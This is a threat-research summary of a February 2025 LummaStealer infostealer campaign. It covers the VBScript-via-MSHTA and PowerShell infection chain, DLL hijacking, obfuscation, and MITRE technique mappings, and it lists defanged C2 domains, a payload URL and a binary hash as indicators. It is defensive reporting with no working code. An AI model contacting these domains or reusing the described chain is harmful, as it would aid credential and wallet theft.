Threat Research

LummaStealer: More Tricks, More Trouble – Part 2

admin
LummaStealer: More Tricks, More Trouble – Part 2

In February 2025, a new campaign employing LummaStealer malware was identified, demonstrating evolving TTPs distinct from previous methods. The malware targets sensitive data through a sophisticated execution chain that begins with outdated Visual Basic Script and incorporates PowerShell for subsequent downloads. Despite its silent execution, it raises concerns due to connections with known C2 domains and potential obfuscation techniques. Affected: LummaStealer malware; Windows systems; phishing campaigns; users of VirtualBox.

Keypoints :

  • RevEngAI team observed a LummaStealer campaign in February 2025.
  • LummaStealer is designed to steal sensitive information, including passwords and cryptocurrency wallets.
  • The malware employs distinct tactics compared to the previously analyzed ClickFix campaign.
  • The infection chain initiates with Visual Basic Script, which is executed via the MSHTA utility.
  • PowerShell is used to decode and execute commands from a remote endpoint.
  • DLL hijacking risks are present due to fixed references in binaries, including Update.exe and associated DLLs.
  • Obfuscation techniques complicate malware analysis through control flow manipulation.
  • Identified C2 domains indicate ongoing communication and data exfiltration potential.
  • RevEng.AI facilitates tracking and analysis of malware similarities and variations.

MITRE Techniques :

  • Command and Scripting Interpreter (T1059.005): Utilized Visual Basic Script during the initial stage of the infection chain.
  • Command and Scripting Interpreter (T1059.001): Used PowerShell for executing downloaded commands from the malicious endpoint.
  • Credential Dumping (T1003.001): Extracts sensitive information like passwords and cryptocurrency wallets.
  • DLL Search Order Hijacking (T1574.001): Fixed reference to VBoxRT.dll and VBoxVMM.dll allows for potential exploitation.
  • Obfuscated Files or Information (T1027): Implemented obfuscated control flow in LummaStealer to evade detection.

Indicator of Compromise :

  • Domain: guiacui.com[.]br
  • Domain: guiacui.com[.]br/wp-content/plugins/goodlayers-core-portfolio/languages/es[.]txt
  • Domain: minlliving[.]biz
  • Domain: guardeduppe[.]com
  • SHA-256: 366bd0e69838b03d40352962e46e8b2eedf5f467d01a0a9f073056dc51a5b3e0 (LummaStealer binary)

Full Story: https://blog.reveng.ai/lummastealer-more-tricks-more-trouble-part-2/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint